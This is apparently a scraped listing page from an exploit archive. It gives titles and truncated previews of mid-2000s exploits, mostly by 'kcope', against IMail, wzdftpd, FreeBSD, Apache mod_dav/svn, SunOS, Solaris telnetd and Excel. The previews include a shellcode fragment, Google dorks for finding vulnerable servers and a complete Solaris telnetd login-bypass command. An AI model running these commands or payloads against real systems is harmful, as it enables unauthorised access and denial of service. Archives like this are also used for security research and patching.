IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit

No description provided by source. IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope June 2005 Confidential! use IO::Socket; 316 bytes $cbsc = \xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA .\xEB\x05\xE8\xEB\xFF\xFF\xFF...

WzdFTPD <= 0.5.4 - Remote Command Execution Exploit

No description provided by source. 0day0day0day0day0day0day0day ------------------------------- wzdftpd remote exploit by kcope nice call to popen3 on custom site commands... August 2005 confidential! keep private! ------------------------------- 0day0day0day0day0day0day0day . . | // / | | / \ /...

FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit

No description provided by source. / FreeBSD master.passwd disclosure exploit by kcope in 2005, kingcopeatgmx.net thanks to revoguard just compile and execute .. look into the kmem file it contains the master.passwd tested on unpatched FreeBSD 4.11-RELEASE advisory:...

FreeBSD Qpopper poppassd latest version local r00t exploit

No description provided by source. !/bin/sh FreeBSD Qpopper poppassd latest version local r00t exploit by kcope tested on FreeBSD 5.4-RELEASE POPPASSDPATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo "" echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep ...

Apoche mod_dav Denial Of Service

furoffyourcat.pl Apache moddav / svn Remote Denial of Service Exploit by kcope / June 2009 Will exhaust all system memory Needs Authentication on normal DAV This can be especially serious stuff when used against svn subversion servers!! Svn might let the PROPFIND slip through without...

The father of all bombs - another webdav fiasco

Apache moddav / svn Remote Denial of Service Exploit Google Dorks: inurl:svn inurl:trunk "powered by subversion version" Information on the bug XML Bomb: http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/ Enjoy! -------------------------------------------------------------------...

Apache mod_dav / svn Remote Denial of Service Exploit

No description provided by source. furoffyourcat.pl Apache moddav / svn Remote Denial of Service Exploit by kcope / June 2009 Will exhaust all system memory Needs Authentication on normal DAV This can be especially serious stuff when used against svn subversion servers!! Svn might let the PROPFIN...

Apache mod_dav / svn Remote Denial of Service Exploit

Exploit for multiple platform in category dos / poc ===================================================== Apache moddav / svn Remote Denial of Service Exploit ===================================================== furoffyourcat.pl Apache moddav / svn Remote Denial of Service Exploit by kcope / Jun...

Apache mod_dav svn - Remote Denial of Service

Apache moddav svn - Remote Denial of Service furoffyourcat.pl Apache moddav / svn Remote Denial of Service Exploit by kcope / June 2009 Will exhaust all system memory Needs Authentication on normal DAV This can be especially serious stuff when used against svn subversion servers!! Svn might let t...

eMule &lt;= 0.42d IRC Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl eMule = 0.42d Remote Exploit by kcope exploits the DecodeBase16 buffer overflow tested on WinXP SP1 / Win2k SP4 bindport/connectback shellcode thanks Kostya Kortchinsky for his posting to bugtraq...

SunOS 5.10 Remote ICMP Kernel Crash Exploit

No description provided by source. / SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope Null Pointer Dereference in Kernel Space Seems to work only if attacked in the same network segment, maybe because of firewalls/routers in place. This seems to be the issue described in bid 22323. / include...

SunOS 5.10 - Remote ICMP Kernel Crash

SunOS 5.10 - Remote ICMP Kernel Crash / SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope Null Pointer Dereference in Kernel Space Seems to work only if attacked in the same network segment, maybe because of firewalls/routers in place. This seems to be the issue described in bid 22323. / inclu...

SunOS 5.10 - Remote ICMP Kernel Crash

/ SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope Null Pointer Dereference in Kernel Space Seems to work only if attacked in the same network segment, maybe because of firewalls/routers in place. This seems to be the issue described in bid 22323. / include include include include include...

FreeBSD (4.x , &lt; 5.4) master.passwd Disclosure Exploit

No description provided by source. / FreeBSD master.passwd disclosure exploit by kcope in 2005, kingcopeatgmx.net thanks to revoguard just compile and execute .. look into the kmem file it contains the master.passwd tested on unpatched FreeBSD 4.11-RELEASE advisory:...

Microsoft Excel Unicode Local Overflow Exploit PoC

No description provided by source. excelsexywarez.pl excel unicode overflow poc by kcope in 2006 thanks to revoguard and alex use Spreadsheet::WriteExcel; my $workbook = Spreadsheet::WriteExcel-new"FUCK.xls"; $worksheet = $workbook-addworksheet; $format = $workbook-addformat;...

Solaris 10/11 Telnetd Bypass

telnetd on Solaris 10/11 allows for access bypass by passing a username to -l -f. This doesn't work for root but works for all other uids. POC: telnet -l "-fbin" targetaddress Discovered by kcope...

Microsoft Excel - Universal Hlink Local Buffer Overflow

excel hlink overflow UNIVERSAL poc by SYS 49152 public version works with ANY of the following oses/office combinations: -windows 2k sp4/XP SP1/XP SP2 -office 2000/Xp/2003 bindshell on port 49152 thanks go to BuzzDee for some things.. credits to kcope for finding the vuln.. I'm always ready to jo...

Microsoft Excel Universal Hlink Local Buffer Overflow Exploit

No description provided by source. excel hlink overflow UNIVERSAL poc by SYS 49152 public version works with ANY of the following oses/office combinations: -windows 2k sp4/XP SP1/XP SP2 -office 2000/Xp/2003 bindshell on port 49152 thanks go to BuzzDee for some things.. credits to kcope for findin...

hlink_exploit_pl.txt

!perl "Microsoft Office Excel 2003" Hlink Stack/SEH Overflow Exploit Author: Manuel Santamarina Suarez The vulnerability was discovered by 'kcope'. First click on the link and then on the "Yes" button to cause the stack overflow. fixed shellcode location !! Must be free of Unicode null terminator...

Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit

No description provided by source. !perl "Microsoft Office Excel 2003" Hlink Stack/SEH Overflow Exploit Author: Manuel Santamarina Suarez The vulnerability was discovered by 'kcope'. First click on the link and then on the "Yes" button to cause the stack overflow. fixed shellcode location !! Must...